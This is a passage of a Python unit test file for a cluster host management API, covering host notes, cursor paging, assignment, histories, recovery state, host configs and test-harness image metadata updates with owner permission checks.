note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[0].user, note_entities[2].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[2].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[2].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[1].user, note_entities[0].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[0].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[0].recovery_action)
def testListHostNotes_includeDeviceNotes(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
type=common.NoteType.DEVICE_NOTE,
hostname='host_1',
device_serial='device_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
ndb.put_multi(note_entities)
# The result will be sorted by timestamp in descending order. `
api_request = {
'hostname': 'host_1',
'count': 2,
'include_device_notes': True,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertTrue(host_note_collection_msg.more)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[3].hostname)
self.assertEqual(note_msgs[0].user, note_entities[3].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[3].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[3].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[3].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[3].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[1].user, note_entities[2].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[2].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[2].recovery_action)
# query the second page to make sure the cursor works
api_request = {
'hostname': 'host_1',
'count': 3,
'include_device_notes': True,
'cursor': host_note_collection_msg.next_cursor,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertFalse(host_note_collection_msg.more)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[0].user, note_entities[0].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[0].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[0].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[1].hostname)
self.assertEqual(note_msgs[1].user, note_entities[1].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[1].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[1].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[1].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[1].recovery_action)
def testListHostNotes_withCursorAndOffsetAndBackwards(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
ndb.put_multi(note_entities)
# The result will be sorted by timestamp in descending order. `
api_request = {
'hostname': 'host_1',
'count': 2,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertTrue(host_note_collection_msg.more)
self.assertIsNotNone(host_note_collection_msg.next_cursor)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[3].hostname)
self.assertEqual(note_msgs[0].user, note_entities[3].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[3].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[3].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[3].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[3].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[1].user, note_entities[2].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[2].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[2].recovery_action)
# fetch next page
api_request = {
'hostname': 'host_1',
'count': 2,
'cursor': host_note_collection_msg.next_cursor,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertIsNotNone(host_note_collection_msg.prev_cursor) # has previous
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[0].user, note_entities[0].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[0].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[0].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[1].hostname)
self.assertEqual(note_msgs[1].user, note_entities[1].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[1].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[1].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[1].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[1].recovery_action)
# fetch previous page (same as first page)
api_request = {
'hostname': 'host_1',
'count': 2,
'cursor': host_note_collection_msg.prev_cursor,
'backwards': True,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[3].hostname)
self.assertEqual(note_msgs[0].user, note_entities[3].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[3].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[3].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[3].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[3].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[1].user, note_entities[2].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[2].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[2].recovery_action)
def testBatchGetHostNotes(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
hostname='host_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
keys = ndb.put_multi(note_entities)
# The result will be sorted by timestamp in descending order. `
api_request = {
'hostname': 'host_1',
'ids': [keys[0].id(), keys[1].id(), keys[3].id()],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchGetNotes', api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[0].user, note_entities[0].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[0].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[0].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[1].hostname)
self.assertEqual(note_msgs[1].user, note_entities[1].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[1].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[1].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[1].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[1].recovery_action)
def testDeleteHostNotes(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
hostname='host_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
keys = ndb.put_multi(note_entities)
# When the ID does not match hostname, none of notes will be deleted.
api_request = {
'hostname': 'host_2',
'ids': [keys[0].id(), keys[1].id(), keys[3].id(), 100],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchDeleteNotes', api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
self.assertLen(list(filter(None, ndb.get_multi(keys))), len(keys))
# When all IDs matches exactly, all requested notes get deleted.
api_request = {
'hostname': 'host_1',
'ids': [keys[0].id(), keys[2].id()],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchDeleteNotes', api_request)
self.assertEqual('200 OK', api_response.status)
self.assertCountEqual([note_entities[1].key.id(),
note_entities[3].key.id()],
[entity.key.id() for entity in ndb.get_multi(keys)
if entity])
def testAssign(self):
"""Tests Assign."""
api_request = {
'hostnames': [self.ndb_host_0.hostname, self.ndb_host_1.hostname],
'assignee': 'assignee@example.com',
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Assign',
api_request)
self.assertEqual('200 OK', api_response.status)
self.ndb_host_0 = self.ndb_host_0.key.get()
self.assertEqual('assignee@example.com', self.ndb_host_0.assignee)
self.ndb_host_1 = self.ndb_host_1.key.get()
self.assertEqual('assignee@example.com', self.ndb_host_1.assignee)
def testUnassign(self):
"""Tests Unassign."""
self.ndb_host_1.assignee = 'assignee@example.com'
self.ndb_host_1.put()
self.ndb_host_2.assignee = 'assignee@example.com'
self.ndb_host_2.put()
api_request = {
'hostnames': [self.ndb_host_0.hostname, self.ndb_host_1.hostname],
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Unassign',
api_request)
self.assertEqual('200 OK', api_response.status)
self.ndb_host_0 = self.ndb_host_0.key.get()
self.assertIsNone(self.ndb_host_0.assignee)
self.ndb_host_1 = self.ndb_host_1.key.get()
self.assertIsNone(self.ndb_host_1.assignee)
def testListHostHistories(self):
"""Tests ListHistories returns all host histories."""
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.KILLING
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.GONE
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
api_request = {'hostname': self.ndb_host_0.hostname}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(3, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.GONE.name,
host_history_collection.histories[0].host_state)
self.assertEqual(api_messages.HostState.KILLING.name,
host_history_collection.histories[1].host_state)
self.assertEqual(api_messages.HostState.RUNNING.name,
host_history_collection.histories[2].host_state)
def testListHostHistories_withCursorAndOffsetAndBackwards(self):
"""Tests ListHistories returns histories applying a count and offset."""
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.KILLING
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.GONE
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
# fetch first page
api_request = {'hostname': self.ndb_host_0.hostname, 'count': 2}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.GONE.name,
host_history_collection.histories[0].host_state)
self.assertEqual(api_messages.HostState.KILLING.name,
host_history_collection.histories[1].host_state)
# fetch next page
api_request = {
'hostname': self.ndb_host_0.hostname,
'count': 2,
'cursor': host_history_collection.next_cursor
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.RUNNING.name,
host_history_collection.histories[0].host_state)
# fetch previous page (same as first page)
api_request = {
'hostname': self.ndb_host_0.hostname,
'count': 2,
'cursor': host_history_collection.prev_cursor,
'backwards': True
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.GONE.name,
host_history_collection.histories[0].host_state)
self.assertEqual(api_messages.HostState.KILLING.name,
host_history_collection.histories[1].host_state)
def testCheckTimestamp(self):
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.EQUAL,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.EQUAL,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.LESS_THAN,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.LESS_THAN,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.GREATER_THAN,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.GREATER_THAN,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.GREATER_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.GREATER_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.LESS_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.LESS_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 30)))
def testBatchSetRecoveryState(self):
"""Tests BatchSetRecoveryState."""
api_request = {
'host_recovery_state_requests': [
{
'hostname': self.ndb_host_0.hostname,
'recovery_state': 'ASSIGNED',
'assignee': 'user1'
},
{
'hostname': self.ndb_host_1.hostname,
'recovery_state': 'FIXED',
'assignee': 'user1'
},
]
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchSetRecoveryState',
api_request)
self.assertEqual('200 OK', api_response.status)
self.ndb_host_0 = self.ndb_host_0.key.get()
self.assertEqual('ASSIGNED', self.ndb_host_0.recovery_state)
self.assertEqual('user1', self.ndb_host_0.assignee)
self.ndb_host_1 = self.ndb_host_1.key.get()
self.assertEqual('user1', self.ndb_host_1.assignee)
self.assertEqual('FIXED', self.ndb_host_1.recovery_state)
def testListHostConfigs(self):
"""Test ListHostConfigs."""
configs = [
datastore_test_util.CreateHostConfig(
'host1', 'lab1', cluster_name='cluster1'),
datastore_test_util.CreateHostConfig(
'host2', 'lab1', cluster_name='cluster2'),
datastore_test_util.CreateHostConfig(
'host3', 'lab2', cluster_name='cluster3'),
]
api_request = {}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHostConfigs',
api_request)
self.assertEqual('200 OK', api_response.status)
host_config_collection = protojson.decode_message(
api_messages.HostConfigCollection, api_response.body)
self.assertLen(host_config_collection.host_configs, 3)
self.assertCountEqual(
[config.hostname for config in configs],
[config.hostname for config in host_config_collection.host_configs])
self.assertCountEqual(
[config.lab_name for config in configs],
[config.lab_name for config in host_config_collection.host_configs])
self.assertCountEqual(
[config.cluster_name for config in configs],
[config.cluster_name for config in host_config_collection.host_configs])
def testListHostConfigs_withLabNameFilter(self):
"""Test ListHostConfigs with lab_name filter."""
datastore_test_util.CreateHostConfig(
'host1', 'lab1', cluster_name='cluster1')
datastore_test_util.CreateHostConfig(
'host2', 'lab1', cluster_name='cluster2')
datastore_test_util.CreateHostConfig(
'host3', 'lab2', cluster_name='cluster3')
api_request = {
'lab_name': 'lab1',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHostConfigs',
api_request)
self.assertEqual('200 OK', api_response.status)
host_config_collection = protojson.decode_message(
api_messages.HostConfigCollection, api_response.body)
self.assertLen(host_config_collection.host_configs, 2)
self.assertCountEqual(
['host1', 'host2'],
[config.hostname for config in host_config_collection.host_configs])
self.assertCountEqual(
['lab1', 'lab1'],
[config.lab_name for config in host_config_collection.host_configs])
self.assertCountEqual(
['cluster1', 'cluster2'],
[config.cluster_name for config in host_config_collection.host_configs])
def testGetHostMetadata(self):
"""Tests GetHostMetadata."""
datastore_test_util.CreateHostMetadata(
'host1', test_harness_image='a_test_harness_image')
api_request = {
'hostname': 'host1',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.GetMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = protojson.decode_message(
api_messages.HostMetadata, api_response.body)
self.assertEqual('host1', host_metadata.hostname)
self.assertEqual('a_test_harness_image', host_metadata.test_harness_image)
def testGetHostMetadata_noHostMetadata(self):
"""Tests GetHostMetadata with no metadata."""
api_request = {
'hostname': 'host1',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.GetMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = protojson.decode_message(
api_messages.HostMetadata, api_response.body)
self.assertEqual('host1', host_metadata.hostname)
self.assertIsNone(host_metadata.test_harness_image)
def testPatchHostMetadata_previouslyNotExist(self):
"""Tests PatchHostMetadata previously not exist."""
api_request = {
'hostname': 'host1',
'test_harness_image': 'image_a',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.PatchMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
metadata_entity = datastore_entities.HostMetadata.get_by_id('host1')
self.assertEqual('image_a', metadata_entity.test_harness_image)
def testPatchHostMetadata_patchExisting(self):
"""Tests PatchHostMetadata previously not exist."""
datastore_test_util.CreateHostMetadata(
'host1', test_harness_image='image_a')
api_request = {
'hostname': 'host1',
'test_harness_image': 'image_b',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.PatchMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
metadata_entity = datastore_entities.HostMetadata.get_by_id('host1')
self.assertEqual('image_b', metadata_entity.test_harness_image)
def testBatchUpdateHostMetadata_succeedsWithNoExistingMetadata(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag = 'new'
image_name_new = ':'.join([repo_name, tag])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname1)
self.assertEqual(hostname1, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname1)
self.assertEqual(hostname1, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname2)
self.assertEqual(hostname2, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname2)
self.assertEqual(hostname2, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
def testBatchUpdateHostMetadata_succeedsWithExistingMetadata(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostMetadata(
hostname=hostname1, test_harness_image=image_name_old)
datastore_test_util.CreateHostMetadata(
hostname=hostname2, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old])
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag_new])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname1)
self.assertEqual(hostname1, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname1)
self.assertEqual(hostname1, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname2)
self.assertEqual(hostname2, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname2)
self.assertEqual(hostname2, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
def testBatchUpdateHostMetadata_succeedsWithUnchangedImage(self):
"""Test batch set test_harness_image for hosts."""
hostname = 'host1'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostMetadata(
hostname=hostname, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old, tag_new])
api_request = {
'hostnames': [hostname],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname)
self.assertEqual(hostname, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
# No update should start in this case, because the image is not changed.
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname))
def testBatchUpdateHostMetadata_failUserNotPermitted(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostMetadata(
hostname=hostname1, test_harness_image=image_name_old)
datastore_test_util.CreateHostMetadata(
hostname=hostname2, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old])
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag_new])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': 'wrongperson',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request, expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
expected_error_msg = (
b'Request user wrongperson is not in the owner list'
b' of hosts [host1, host2]. ')
self.assertIn(expected_error_msg, api_response.body)
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname1))
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname2))
def testBatchUpdateHostMetadata_failHostNotEnabled(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=False)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=False)
datastore_test_util.CreateHostMetadata(
hostname=hostname1, test_harness_image=image_name_old)
datastore_test_util.CreateHostMetadata(
hostname=hostname2, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old])
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag_new])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': owner,
}
